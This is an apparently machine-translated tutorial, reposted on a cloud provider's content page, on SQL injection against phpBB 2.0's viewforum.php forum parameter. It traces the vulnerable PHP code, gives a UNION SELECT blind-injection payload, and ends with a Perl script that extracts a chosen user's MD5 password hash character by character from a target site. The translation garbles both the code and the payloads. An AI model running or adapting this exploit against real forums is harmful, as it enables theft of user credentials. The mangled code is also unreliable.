Php injection instance

Source: Internet
Author: User
It is difficult to see a complete article about php injection and use code on the Internet for php injection instances. so I have had mysql and php hard for a few weeks, let's talk about my recess. I hope it will help you! I believe everyone is familiar with asp injection, and php injection is more difficult than asp, because the magic_gpc option of php is indeed a headache and should not appear in injection.
It is difficult to see a complete article about php injection and use code on the Internet for php injection instances. so I have had mysql and php hard for a few weeks, let's talk about my recess. I hope it will help you!
I believe that you are already very familiar with asp injection, and php injection is more difficult than asp, because the magic_gpc option of php is indeed a headache, so do not use quotation marks in injection, most php is combined with mysql, and the functional disadvantages of mysql prevent SQL njection attacks to some extent from the perspective of another person. I will give an example here, taking phpbb2.0 as an example:
One variable in viewforum. php is not filtered:
If (isset ($ HTTP_GET_VARS {
$ Forum_id = (isset ($ HTTP_GET_VARS
($ HTTP_POST_VARS }
Else if (isset ($ HTTP_GET_VARS ['forum '])
{
$ Forum_id = $ HTTP_GET_VARS ['forum'];
}
Else
{
$ Forum_id = ';
}
This is the forum, which is directly put into the query below:
If (! Empty ($ forum_id ))
{
$ SQL = "SELECT *
FROM ". FORUMS_TABLE ."
WHERE forum_id = $ forum_id ";
If (! ($ Result = $ db-> SQL _query ($ SQL )))
{
Message_die (GENERAL_ERROR, 'could not obtain forums information', ', _ LINE __, _ FILE __, $ SQL );
}
}
Else
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}

If it is asp, I believe many people will inject it. if the forum specified by forum_id does not exist, $ result will be null. Therefore, the information of cocould not obtain forums information will be returned, so the following code cannot be executed.
//
// If the query doesn't return any rows this isn' t a valid forum. Inform
// The user.
//
If (! ($ Forum_row = $ db-> SQL _fetchrow ($ result )))
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}

//
// Start session management
//
$ Userdata = session_pagestart ($ user_ip, $ forum_id) /*************************************** *

The key is the line with the asterisk. here is a function session_pagestart ($ user_ip, $ thispage_id), which is a function defined in session. php.

Long, it will not be completely pasted out. if you are interested, you can check it yourself. The key is that this function also calls session_begin (). the function call is as follows: session_begin ($ user_id, $ user_ip,

$ Thispage_id, TRUE), which is also defined in this file, with the following code
$ SQL = "UPDATE". SESSIONS_TABLE ."
SET session_user_id = $ user_id, session_start = $ current_time, session_time = $ current_time, session_page =

$ Page_id, session_logged_in = $ login
WHERE session_id = '". $ session_id ."'
AND session_ip = '$ user_ip '";
If (! ($ Result = $ db-> SQL _query ($ SQL) │! $ Db-> SQL _affectedrows ())
{
$ Session_id = md5 (uniqid ($ user_ip ));

$ SQL = "INSERT INTO". SESSIONS_TABLE ."
(Session_id, session_user_id, session_start, session_time, session_ip, session_page,

Session_logged_in)
VALUES ('$ session_id', $ user_id, $ current_time, $ current_time, '$ user_ip', $ page_id, $ login )";
If (! ($ Result = $ db-> SQL _query ($ SQL )))
{
Message_die (CRITICAL_ERROR, 'Error creating new session: session_begin ',', _ LINE __, _ FILE __,

$ SQL );
}


Here, session_page defines an integer in mysql ?? $ Page_id, that is, $ forum_id. if it is not an integer, an Error is reported, and an Error occurs.

Creating new session: session_begin prompt, so it is very important to specify this $ forum_id value, so I will specify it as:-1% 20 union % 20 select % ,,1, 2%, from % 20phpbb_users % 20 where % 20user_id = 20and % 20ord (substring (user_password,) = 57, no quotation marks! Although the specified forum_id does not exist, the returned query result may not be null. this is to guess whether the ascii value of the first password of user_id is 57, if yes, the $ result in the first piece of code in the article may not be empty, so the problematic function ession_pagestart is executed. if it is not an integer, an error will occur, the Error creating new session: session_begin is displayed, indicating that you guessed the first place. the other places are similar.

Without this error message, I think it is difficult to determine whether the injection is successful even if the injection is successful. it seems that the error message is helpful. the analysis is here, and a piece of test code is attached below. this code can be used to guess other similar md5 passwords with slight modifications. here I use the English version of the return condition, for Chinese and other languages, you only need to change the return condition.

Use HTTP: Request: Common;
Use HTTP: Response;
Use LWP: UserAgent;
$ Ua = new LWP: UserAgent;

Print "************************ n ";
Print "phpbb viewforum. php expn ";
Print "code by pinkeyesn ";
Print "www. icehack. comn ";
Print "************************* n ";
Print "please enter the weak file's url: n ";
Print "e.g. http: // 192.168.1.4/phpBB2/viewforum. phpn ";
$ Adr = ;
Chomp ($ adr );
Print "please enter the user_id that you want to crackn ";
$ U = ;
Chomp ($ u );
Print "work starting, please wait! N ";
@ Pink = (48 .. 57 );
@ Pink = (@ pink, 97 .. 102 );
For ($ j = 1; $ j <= 32; $ j ++ ){
For ($ I = 0; $ I <@ pink; $ I ++ ){
$ Url = $ adr ."? Forum =-1% 20 union % 20 select %, from % 20phpbb_users % 20 where %

20user_id = $ u % 20and % 20ord (substring (user_password, $ j, 1) = $ pink [$ I] ";
$ Request = HTTP: Request-> new ('GET', "$ url ");
$ Response = $ ua-> request ($ request );

If ($ response-> is_success ){
If ($ response-> content = ~ /Error creating new session /){
$ Pwd. = chr ($ pink [$ I]);
Print "$ pwdn ";
}

}
}
}
If ($ pwd ne ""){
Print "successfully, The password is $ pwd, good luckn ";}
Else {
Print "bad luck, work failed! N ";}

As for the recent phpbb2.0.6 search. php issue, you only need to slightly modify the above code. for an error, please correct it on www.icehack.com.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.